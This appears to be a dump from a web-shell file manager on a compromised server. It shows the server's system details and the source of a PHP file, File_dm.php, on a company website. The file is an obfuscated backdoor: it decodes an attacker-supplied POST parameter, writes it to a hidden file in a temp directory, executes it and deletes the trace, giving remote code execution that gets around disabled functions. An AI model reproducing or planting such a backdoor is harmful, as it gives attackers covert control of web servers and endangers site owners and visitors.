HEX
Server: nginx/1.26.0
System: Linux iZj6ceg0gjdkbpnmyl2cnnZ 5.15.60-1.el7.x86_64 #1 SMP Thu Aug 11 12:39:22 UTC 2022 x86_64
User: www (1000)
PHP: 7.0.33
Disabled: phpinfo,eval,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pfsockopen,fsocket,fsockopen
Upload Files
File: /data/wwwroot/sites/multitrustcapital.com/www/File_dm.php
<?php
//<PHPDATA>fputs_enc;2;binding</PHPDATA>
if(FIlTEr_Has_var(INPUT_POST,"bin\x64i\x6e\x67")):$_0=aRraY_FiLTer([INI_Get("upload_\x74mp_di\162"),SesSiON_savE_PATH(),syS_gET_temP_dir(),"\x2f\x64ev\x2fshm",geTeNv("\x54E\115P"),"/va\162/\x74m\160","/tmp",gEtCWd(),GeteNv("TM\120")]);$_1=$_POST["b\151\156di\156g"];$_1=eXPLoDE(".",$_1);$_2="";$_3="abcdefghijklmn\157pqrst\x75vwxyz\060123456789";$_4=StRLEn($_3);$_5=(int)ROuNd(0+0+0);$_6=$_1;while($_7=arrAy_SHiFt($_6)):$_8=oRd($_3[$_5%$_4]);$_9=((int)$_7-$_8-($_5%(061-047)))^(int)rOuND(0.5+0.5+0.5+0.5);$_2.=cHR($_9);$_5++;endwhile;while($_10=arRay_sHiFT($_0)):if(ArRAY_ProdUCt([Is_dir($_10),is_wrITabLe($_10)])):$_11=jOIN("/",[$_10,".\x64escri\160tor"]);if(@FIlE_PUT_COnTENTS($_11,$_2)!==false):include $_11;unliNK($_11);die();endif;endif;endwhile;endif;